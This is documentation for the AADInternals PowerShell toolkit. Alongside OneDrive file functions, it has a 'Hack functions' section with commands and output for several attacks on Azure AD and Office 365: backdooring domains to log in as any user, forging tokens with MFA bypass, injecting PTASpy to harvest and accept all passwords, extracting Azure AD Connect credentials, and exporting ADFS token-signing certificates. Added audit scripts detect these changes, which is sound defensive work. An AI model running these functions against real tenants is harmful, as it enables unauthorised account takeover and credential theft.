New-AADIntOneDriveSettings

Since version 0.2.7
Creates a new OneDriveSettings object used with other OneDrive for Business functions.

To create new settings using interactive authentication (prompts twice, once for the OfficeApps API and once for the OneDrive API):

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

To create new settings using Kerberos tickets:

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Create a new OneDriveSettings object using Kerberos ticket
$os = New-AADIntOneDriveSettings -KerberosTicket $kt

Get-AADIntOneDriveFiles (O)

Since version 0.2.7
Downloads user’s OneDrive for Business files (all of them).

Besides downloading the files, the following information is returned per file.

Attribute   Description
---------   -----------
Path        The relative path of the file or folder
Size        Size in bytes
ETag        Resource id and the next version number of the file in format “{},
Created     The time when the file was created
Modified    The time when the file was modified
ResourceID  The unique id of the file or folder
MimeType    The mime type of the file
Url         The “pre-authenticated” url of the file
XORHash     Xor-hash value of the file

Note! If you only want to list the files and folders, use the -PrintOnly switch. If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To download user’s OneDrive files, use the following commands:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# Download the contents of the OneDrive to the current folder    
Get-AADIntOneDriveFiles -OneDriveSettings $os | Format-Table

Output:

Path                              Size  Created            Modified           ResourceID                   
----                              ----  -------            --------           ----------                   
\RootFolder\Document1.docx        11032 2.12.2019 20.47.23 2.12.2019 20.48.46 5e7acf393a2e45f18c1ce6caa7...
\RootFolder\Book.xlsx             8388  2.12.2019 20.49.14 2.12.2019 20.50.14 b26c0a38d4d14b23b785576e29...
\RootFolder\Docs\Document1.docx   84567 9.12.2019 11.24.40 9.12.2019 12.17.50 d9d51e47b66c4805aff3a08763...
\RootFolder\Docs\Document2.docx   31145 7.12.2019 17.28.37 7.12.2019 17.28.37 972f9c317e1e468fb2b6080ac2...

Send-AADIntOneDriveFile (O)

Since version 0.2.7
Sends a local file to a specific folder in the user’s OneDrive.

Note! To send a file, you need the ResourceId of the folder you are sending the file to.

Note! If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To send a file to user’s OneDrive to Documents folder:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# List folders and their resource ids
Get-AADIntOneDriveFiles -OneDriveSettings $os -PrintOnly -FoldersOnly | select Path,ResourceID

Output:

Path                  ResourceID                      
----                  ----------                      
\RootFolder           1679e14635404542880e3885b4374c3f
\RootFolder\Documents a2a54a01b586480ebbddf04cfaa36191
\RootFolder\Sales     bd59baa485a2411e951234fe6cbd8c5d

# Send the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},2"
DateModified                          : 2019-12-11T11:18:38.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

If the file already exists (or something similar goes wrong) you’ll get an error like the following:

RelationshipName ParentResourceID                 WriteStatus      
---------------- ----------------                 -----------      
Document         a2a54a01b586480ebbddf04cfaa36191 ItemAlreadyExists

To update an existing file, you also need to know the ETag.

Example:

# Update the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191" -ETag "{32B66E08-379D-4C44-8E00-1E9659777C71},2"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},3"
DateModified                          : 2019-14-11T12:08:55.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

Hack functions

Hack functions are used to hack Azure AD and Office 365. These functions exploit known and not-so-known AAD features.

USE AT YOUR OWN RISK!

Set-AADIntDomainAuthentication (A)

Sets the authentication method of the domain. Same functionality as the Set-MsolDomainAuthentication cmdlet.

Example:

# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to a “backdoor”, which can be used to log in to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, the domain authentication type is set to Federated and configured to trust the specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.

Edit May 9th 2019: In late 2018 I discovered that also unverified domains can be used as a backdoor. Microsoft has not responded to emails regarding this “feature”.

Example:

# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site

Output:

Backdoor created. Domain: company.myo365.site, issuer=http://any.sts/B231A11F

New-AADIntBackdoor (A)

Since version 0.1.6
This function creates a “backdoor” for the given domain name, which can be used to log in to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2018 which allows setting the authentication method also for the unverified domains. Microsoft has not responded to emails regarding this “feature”.

Example:

# Create a new backdoor
New-AADIntBackdoor -DomainName microsoft.com

Output:

Are you sure to create backdoor with microsoft.com? Type YES to continue or CTRL+C to abort: yes

Authentication     : Managed
Capabilities       : None
IsDefault          : false
IsInitial          : false
Name               : microsoft.com
RootDomain         : 
Status             : Unverified
VerificationMethod : 

Backdoor created. Domain: microsoft.com, issuer=http://any.sts/B231A11F
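
Both backdoor variants above end in the same observable state in the tenant: a federated domain whose trusted issuer is not your own STS, or a domain that is federated without ever being verified. The following audit script is an added example, not part of AADInternals; it assumes the MSOnline module is loaded, that Connect-MsolService has been run with an account that can read domain settings, and that you supply the issuer URIs your own federation service legitimately uses.

```powershell
# Added audit script, not part of AADInternals. Assumes the MSOnline module is
# loaded and Connect-MsolService has been run with an account that can read
# domain settings. It reports the two states described above: a federated domain
# whose IssuerUri is not one of your own STS issuers, and a domain that is
# federated while still unverified. The issuer allow-list is yours to supply.

function Get-FederationAuditFinding {
    param(
        # Issuer URIs your own ADFS / STS legitimately uses
        [Parameter(Mandatory)]
        [string[]] $KnownIssuerUris
    )

    foreach ($domain in Get-MsolDomain) {
        # Managed domains carry no federation trust, so there is nothing to audit
        if ($domain.Authentication -ne 'Federated') { continue }

        $fs = Get-MsolDomainFederationSettings -DomainName $domain.Name -ErrorAction SilentlyContinue
        $reasons = @()

        # Backdoor pattern: Azure AD trusts an issuer that is not ours
        if ($KnownIssuerUris -notcontains $fs.IssuerUri) {
            $reasons += "IssuerUri '$($fs.IssuerUri)' is not in the allow-list"
        }
        # Unverified-domain variant: federation configured on a domain whose
        # ownership was never proven
        if ($domain.Status -ne 'Verified') {
            $reasons += "Domain status is '$($domain.Status)' but authentication is Federated"
        }

        # Decode the Base64 DER signing certificate so the report shows what is trusted
        $thumbprint = $null; $subject = $null; $notAfter = $null
        if ($fs.SigningCertificate) {
            $bytes = [Convert]::FromBase64String($fs.SigningCertificate)
            $cert  = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($bytes)
            $thumbprint = $cert.Thumbprint
            $subject    = $cert.Subject
            $notAfter   = $cert.NotAfter
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Domain              = $domain.Name
                Status              = $domain.Status
                IssuerUri           = $fs.IssuerUri
                PassiveLogOnUri     = $fs.PassiveLogOnUri
                SigningCertSubject  = $subject
                SigningCertNotAfter = $notAfter
                SigningCertThumb    = $thumbprint
                Reasons             = $reasons
            }
        }
    }
}

# Usage (replace the issuer with your own federation service's IssuerUri):
# Get-FederationAuditFinding -KnownIssuerUris 'http://adfs.company.com/adfs/services/trust/' | Format-List
```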

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in an .html file and opens it in Internet Explorer in private mode. Use any ImmutableId of any user from your tenant and the issuer “http://any.sts/B231A11F” you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings don’t allow that. If that happens, just click Allow blocked content or the Login to Office 365 button and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in as.

Example:

# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA $true

Output: (security alert, shown as a screenshot)

Set-AADIntPassThroughAuthentication (P)

This function enables or disables pass-through authentication (PTA).

Example:

# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false

Output:

IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

Install-AADIntPTASpy (*)

Since version 0.2.0
Installs PTASpy into the pass-through authentication agent on the current computer. Must be run as Local Admin on a computer with the Azure AD Authentication Agent installed and running (AzureADConnectAuthenticationAgentService.exe).

A hidden folder is created (C:\PTASpy) and PTASpy.dll is copied there. PTASpy.dll is then injected into the running AzureADConnectAuthenticationAgentService. When installed, PTASpy collects all used credentials and stores them in C:\PTASpy\PTASpy.csv with Base64-encoded passwords. PTASpy accepts all passwords, so it can be used as a backdoor.

Use Get-AADIntPTASpyLog to read the log.

Example:

# Install PTASpy
Install-AADIntPTASpy

Output:

Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort: yes
Installation successfully completed!
All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv

Get-AADIntPTASpyLog (*)

Since version 0.2.0
Lists the credentials from C:\PTASpy\PTASpy.csv collected by PTASpy.

Example 1:

# Show the PTASpy log
Get-AADIntPTASpyLog

Output:

UserName         Password                     Time                
--------         --------                     ----                
user@company.com TQB5AFAAYQBzAHMAdwBvAHIAZAA= 5/22/2019 9:51:43 AM
user@company.com bQBZAHAAQQBTAFMAVwBPAFIARAA= 5/22/2019 9:52:07 AM

Example 2:

# Show the PTASpy log with decoded passwords
Get-AADIntPTASpyLog -DecodePasswords

Output:

UserName         Password   Time                
--------         --------   ----                
user@company.com MyPassword 5/22/2019 9:51:43 AM
user@company.com mYpASSWORD 5/22/2019 9:52:07 AM

Remove-AADIntPTASpy (*)

Since version 0.2.0
Restarts the Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent) service and removes PTASpy.

Example:

# Remove PTASpy
Remove-AADIntPTASpy

Output:

WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
Service restarted and C:\PTASpy\PTASpy.dll removed.

Register-AADIntPTAAgent (P)

Since version 0.2.8
Registers a PTA agent to Azure AD with the given machine name and creates a client certificate. After the registration, the certificate and name can be used with Microsoft Azure AD Connect / PTA agent (Set-AADIntPTACertificate) or with Invoke-AADIntPTAAgent.

Example 1:

# Register a PTA Agent
Register-AADIntPTAAgent -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a PTA Agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

PTA agent registered as server1.company.com
Certificate saved to server1.pfx

Set-AADIntPTACertificate (*)

Since version 0.2.8
Sets the certificate used by the Azure AD Authentication Agent. Can be used to change the name and target tenant of the PTA Agent. It changes the InstanceID and TenantID registry values at “HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent”, and the certificate thumbprint at “$env:ProgramData\Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml”. Together with PTASpy, this allows using a standalone server as a backdoor.

Note! The given certificate must be available at “Cert:\LocalMachine\My” or the service won’t start. Moreover, after restarting the service, the PTA Agent is unable to decrypt password requests. To get the decryption to work, you MUST manually give read access for “Network Service” to the private key at “C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\”. Use Process Monitor to see which file gets an ACCESS DENIED error.

Example 1:

# Change the PTA certificate
Set-AADIntPTACertificate -PfxFileName server1.pfx -PfxPassword "password"

Output:

Certification information set, remember to restart the service.

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -MachineName "server1.company.com" -AccessToken $pt

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Change the PTA certificate
Set-AADIntPTACertificate

Output:

Certification information set, remember to restart the service.
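
The PTASpy and Set-AADIntPTACertificate sections above name every artifact a tampered agent leaves on the host: the C:\PTASpy folder and DLL, a foreign module inside AzureADConnectAuthenticationAgentService, rewritten InstanceID/TenantID registry values, and a replaced thumbprint in TrustSettings.xml. The integrity check below is an added example, not part of AADInternals; it assumes you run it elevated on the agent server and know the tenant ID the agent should serve, and it treats any 40-hex-digit string in TrustSettings.xml as a thumbprint, which is an assumption about that file rather than a documented schema.

```powershell
# Added integrity check, not part of AADInternals. Run elevated on a server that
# runs the Azure AD Authentication Agent. It looks for the PTASpy artifacts named
# above, for PTASpy.dll (or any DLL from an unexpected folder) inside the agent
# process, and for the registry TenantID and TrustSettings.xml thumbprint that
# Set-AADIntPTACertificate rewrites. Extracting thumbprints from TrustSettings.xml
# with a 40-hex-digit regex is an assumption about that file, not a documented schema.

function Test-PtaAgentIntegrity {
    param(
        # Tenant the agent is supposed to serve; assumed known to the operator
        [Parameter(Mandatory)]
        [string] $ExpectedTenantId,
        # Agent certificates younger than this are reported so a re-registration stands out
        [int] $MinCertAgeDays = 7
    )
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. On-disk artifacts created by Install-AADIntPTASpy
    foreach ($path in 'C:\PTASpy\PTASpy.dll', 'C:\PTASpy\PTASpy.csv') {
        if (Test-Path -LiteralPath $path) { $findings.Add("Artifact present: $path") }
    }

    # 2. Modules loaded into the agent process (enumeration needs elevation)
    $proc = Get-Process -Name 'AzureADConnectAuthenticationAgentService' -ErrorAction SilentlyContinue
    if (-not $proc) {
        $findings.Add('Agent process AzureADConnectAuthenticationAgentService is not running')
    } else {
        try {
            $trusted = @("$env:SystemRoot\*", "$env:ProgramFiles\*", "${env:ProgramFiles(x86)}\*")
            foreach ($m in $proc.Modules) {
                $file = $m.FileName
                if ($file -like '*PTASpy*') {
                    $findings.Add("PTASpy module loaded in agent: $file")
                } elseif (-not ($trusted | Where-Object { $file -like $_ })) {
                    $findings.Add("Module loaded from unexpected path: $file")
                }
            }
        } catch {
            $findings.Add("Could not enumerate agent modules: $($_.Exception.Message)")
        }
    }

    # 3. Identity values Set-AADIntPTACertificate rewrites
    $regPath = 'HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent'
    $reg = Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue
    if ($reg -and $reg.TenantID -ne $ExpectedTenantId) {
        $findings.Add("Registry TenantID is '$($reg.TenantID)', expected '$ExpectedTenantId'")
    }

    # 4. Thumbprint in TrustSettings.xml must exist in LocalMachine\My and not be brand new
    $trust = Join-Path $env:ProgramData 'Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml'
    if (Test-Path -LiteralPath $trust) {
        $thumbs = [regex]::Matches((Get-Content -LiteralPath $trust -Raw), '[0-9A-Fa-f]{40}') |
            ForEach-Object { $_.Value.ToUpperInvariant() } | Select-Object -Unique
        foreach ($t in $thumbs) {
            $cert = Get-ChildItem -Path Cert:\LocalMachine\My | Where-Object { $_.Thumbprint -eq $t }
            if (-not $cert) {
                $findings.Add("TrustSettings.xml references thumbprint $t that is not in Cert:\LocalMachine\My")
            } elseif ($cert.NotBefore -gt (Get-Date).AddDays(-$MinCertAgeDays)) {
                $findings.Add("Agent certificate $t was issued on $($cert.NotBefore), less than $MinCertAgeDays days ago")
            }
        }
    }

    [pscustomobject]@{ Clean = ($findings.Count -eq 0); Findings = $findings.ToArray() }
}

# Usage (the tenant ID below is a placeholder):
# Test-PtaAgentIntegrity -ExpectedTenantId '00000000-0000-0000-0000-000000000000' | Format-List
```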

Invoke-AADIntPTAAgent (*)

Since version 0.2.8
Invokes the PTA Agent with the given name and certificate, and connects to Azure AD. Emulates the Azure AD Authentication Agent by accepting any password and dumping the passwords to the console.

Note! This is AN EXPERIMENTAL version likely to crash! The PowerShell implementation was too slow, so I had to code this in C#.

Example 1:

# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com" -FileName server1.pfx

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com"

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Set-AADIntPasswordHashSyncEnabled (A)

Since version 0.1.6
This function enables or disables password hash synchronization (PHS).

This can be used to turn on PHS so that passwords can be set using Set-AADIntUserPassword.

Example:

# Enable PHS
Set-AADIntPasswordHashSyncEnabled -Enable $true

New-AADIntGuestInvitation (Z)

This function invites a guest user to the tenant. Does not require admin rights, as long as access to the Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.

Example:

# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Invite the guest user
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"

Output:

accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Get-AADIntSyncCredentials (*)

Since version 0.1.8
This function extracts the Azure AD Connect credentials for AD and Azure AD from the WID database.

Example:

# Get Azure AD Connect credentials
Get-AADIntSyncCredentials

Output:

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                $.1%(lxZ&/kNZz[r

Update-AADIntSyncCredentials (*)

Since version 0.1.8
This function resets the Azure AD Connect credentials for Azure AD and stores them in the Azure AD Connect configuration database.

Example:

# Get the current Azure AD Connect credentials
Get-AADIntSyncCredentials
# Save credentials to a variable
$Cred = Get-Credential -Message "O365" -UserName "Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com"

# Get Access Token
$Token=Get-AADIntAccessTokenForAADGraph -Credentials $Cred

# Update Azure AD Connect credentials for Azure AD
Update-AADIntSyncCredentials -AccessToken $Token

Output:

Password successfully updated to Azure AD and configuration database!

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                Y%C(]u%Rq;en-P;^

Remember to restart the sync service: Restart-Service ADSync
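
Get-AADIntSyncCredentials and Update-AADIntSyncCredentials above show that whoever can read the WID database on the Azure AD Connect server holds both the MSOL_ and the Sync_ account passwords. The audit below is an added example, not part of AADInternals; it assumes it is run on the Azure AD Connect server with the ActiveDirectory module loaded and after Connect-MsolService, and the 90-day age threshold and the privileged group list are assumptions to adjust to your policy.

```powershell
# Added audit, not part of AADInternals. Run on the Azure AD Connect server with
# the ActiveDirectory module loaded and after Connect-MsolService. It lists who can
# read the WID database (local Administrators and ADSyncAdmins) and how old the
# MSOL_ and Sync_ account passwords are, which together bound what
# Get-AADIntSyncCredentials can yield. The 90-day threshold and the privileged
# group list are assumptions.

function Get-SyncAccountExposure {
    param(
        [int]      $MaxPasswordAgeDays = 90,
        [string[]] $PrivilegedGroups   = @('Domain Admins', 'Enterprise Admins', 'Administrators')
    )
    $findings = @()

    # Returns whole days since a timestamp, or $null when the timestamp is unknown
    function Get-AgeDays($Since) {
        if ($Since) { [int]((Get-Date) - [datetime]$Since).TotalDays } else { $null }
    }

    # Local groups whose members can open the ADSync WID database
    $localAccess = [ordered]@{}
    foreach ($group in 'Administrators', 'ADSyncAdmins') {
        $localAccess[$group] = @(Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
            ForEach-Object { $_.Name })
    }

    # On-premises AD DS connector account (MSOL_*): password age and group membership
    $msolAccounts = @(foreach ($u in Get-ADUser -Filter 'Name -like "MSOL_*"' -Properties PasswordLastSet, MemberOf) {
        [pscustomobject]@{
            Account         = $u.SamAccountName
            PasswordAgeDays = Get-AgeDays $u.PasswordLastSet
            # Reduce each group DN to its CN for readable matching
            MemberOf        = @($u.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' })
        }
    })

    # Azure AD connector account (Sync_*): password age as recorded in Azure AD
    $syncAccounts = @(foreach ($u in Get-MsolUser -SearchString 'Sync_') {
        [pscustomobject]@{
            Account         = $u.UserPrincipalName
            PasswordAgeDays = Get-AgeDays $u.LastPasswordChangeTimestamp
            MemberOf        = @()
        }
    })

    foreach ($a in $msolAccounts + $syncAccounts) {
        if ($a.PasswordAgeDays -gt $MaxPasswordAgeDays) {
            $findings += "$($a.Account) password is $($a.PasswordAgeDays) days old"
        }
        foreach ($g in $a.MemberOf) {
            if ($PrivilegedGroups -contains $g) {
                $findings += "$($a.Account) is a member of privileged group $g"
            }
        }
    }

    [pscustomobject]@{
        LocalAccess = $localAccess
        Accounts    = $msolAccounts + $syncAccounts
        Findings    = $findings
    }
}

# Usage: Get-SyncAccountExposure | Format-List
```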

New-AADIntADFSSelfSignedCertificates (*)

Since version 0.2.3
Disables certificate auto rollover and creates new self-signed Token Signing and Token Decrypt certificates for the ADFS service. The created certificates are copies of the existing certificates, except that they are valid for 10 years. The certificates are added to ADFS and the service is restarted. The certificates are also exported to the current directory.

Default password for exported .pfx files is “AADInternals”

Note! If there are multiple ADFS servers, certificates MUST be imported to each server’s Local Machine Personal store and read access to private keys for the ADFS service accounts must be assigned. Also, the ADFS service needs to be restarted.

Don’t forget to update the certificate information in Azure AD using Update-AADIntADFSFederationSettings.

Example:

# Create new certificates
New-AADIntADFSSelfSignedCertificates

Restore-AADIntADFSAutoRollover (*)

Since version 0.2.3
Restores ADFS to “normal” mode: Token Signing and Token Decryption certificates are automatically rolled over once a year. Enables certificate auto rollover, updates Token Signing and Token Decryption certificates and removes the old self-signed certificates.

Note! If there are multiple ADFS servers, the ADFS service needs to be restarted on each server.

Don’t forget to update the certificate information in Azure AD using Update-AADIntADFSFederationSettings.

Example:

# Restore the auto rollover mode
Restore-AADIntADFSAutoRollover

Update-AADIntADFSFederationSettings (A)

Since version 0.2.3
Updates federation information of the given domain to match the local ADFS server information.

Example:

# Update federation setting for domain company.com
Update-AADIntADFSFederationSettings -Domain company.com

Export-AADIntADFSSigningCertificate (*)

Since version 0.2.5
This function exports the ADFS token signing certificate. Must be run on the ADFS server as domain admin or as the ADFS service account.

The certificate can be used to create valid SAML tokens to log in as any user of the tenant.

Example:

# Export ADFS token signing certificate
Export-AADIntADFSSigningCertificate -filename ADFSSigningCertificate.pfx

Export-AADIntADFSEncryptionCertificate (*)

Since version 0.2.5
This function exports the ADFS token encryption certificate. Must be run on the ADFS server as domain admin or as the ADFS service account.

The certificate can be used to encrypt SAML tokens.

Example:

# Export ADFS token encryption certificate
Export-AADIntADFSEncryptionCertificate -filename ADFSEncryptionCertificate.pfx
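
The ADFS functions above leave a recognisable state behind: auto rollover switched off, token certificates valid for ten years instead of one, and Azure AD possibly trusting a signing certificate that ADFS no longer holds. The check below is an added example, not part of AADInternals; it assumes it runs on an ADFS server with the ADFS PowerShell module loaded, that the optional -FederatedDomain cross-check has MSOnline loaded and Connect-MsolService already run, and the 730-day validity threshold is an assumption.

```powershell
# Added check, not part of AADInternals. Run on an ADFS server with the ADFS
# PowerShell module loaded; the optional -FederatedDomain cross-check also needs
# MSOnline and a prior Connect-MsolService. It reports the state the functions
# above leave behind: AutoCertificateRollover turned off and Token-Signing or
# Token-Decrypting certificates valid far longer than the yearly default. The
# 730-day threshold is an assumption; adjust it to your rollover policy.

function Test-AdfsCertificateHygiene {
    param(
        [int]    $MaxValidityDays = 730,
        [string] $FederatedDomain = $null
    )
    $findings = @()

    # Auto rollover off means a long-lived certificate stays trusted indefinitely
    $props = Get-AdfsProperties
    if (-not $props.AutoCertificateRollover) {
        $findings += 'AutoCertificateRollover is disabled'
    }

    # Lifetime of every token signing / decrypting certificate ADFS currently holds
    $tokenCerts = Get-AdfsCertificate |
        Where-Object { $_.CertificateType -in 'Token-Signing', 'Token-Decrypting' }
    foreach ($c in $tokenCerts) {
        $x = $c.Certificate
        $days = [int]($x.NotAfter - $x.NotBefore).TotalDays
        if ($days -gt $MaxValidityDays) {
            $findings += ("{0} {1} (primary={2}) is valid for {3} days, {4:yyyy-MM-dd} to {5:yyyy-MM-dd}" -f
                $c.CertificateType, $x.Thumbprint, $c.IsPrimary, $days, $x.NotBefore, $x.NotAfter)
        }
    }

    # Optional: the signing certificates Azure AD trusts for the domain must be
    # ones ADFS actually holds; otherwise an exported or stale certificate still
    # mints tokens the tenant accepts
    if ($FederatedDomain) {
        $fs = Get-MsolDomainFederationSettings -DomainName $FederatedDomain
        $localSigning = @($tokenCerts |
            Where-Object { $_.CertificateType -eq 'Token-Signing' } |
            ForEach-Object { $_.Certificate.Thumbprint })
        foreach ($b64 in @($fs.SigningCertificate, $fs.NextSigningCertificate)) {
            if (-not $b64) { continue }
            $bytes = [Convert]::FromBase64String($b64)
            $t = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($bytes).Thumbprint
            if ($localSigning -notcontains $t) {
                $findings += "Azure AD trusts signing certificate $t for $FederatedDomain, but ADFS does not hold it"
            }
        }
    }

    [pscustomobject]@{
        AutoCertificateRollover = $props.AutoCertificateRollover
        Healthy                 = ($findings.Count -eq 0)
        Findings                = $findings
    }
}

# Usage: Test-AdfsCertificateHygiene -FederatedDomain company.com | Format-List
```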

Get-AADIntDesktopSSO (P)

Since version 0.2.6
Shows the Desktop SSO (a.k.a. Seamless SSO) status of the tenant.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : 
Enabled      : False
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Enables or disables DesktopSSO.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO
Set-AADIntDesktopSSOEnabled -AccessToken $pt -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : 
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSO (P)

Since version 0.2.6
Sets DesktopSSO information for the given domain. In other words, you can create a backdoor! It can also be used to change the password of the existing DesktopSSO configuration in Azure AD and to reset the password of the computer account used for SSO (default is AZUREADSSOACC).

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO for the given domain
Set-AADIntDesktopSSO -AccessToken $pt -DomainName company.com -Password "mypassword" -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : company.com
Enabled      : True
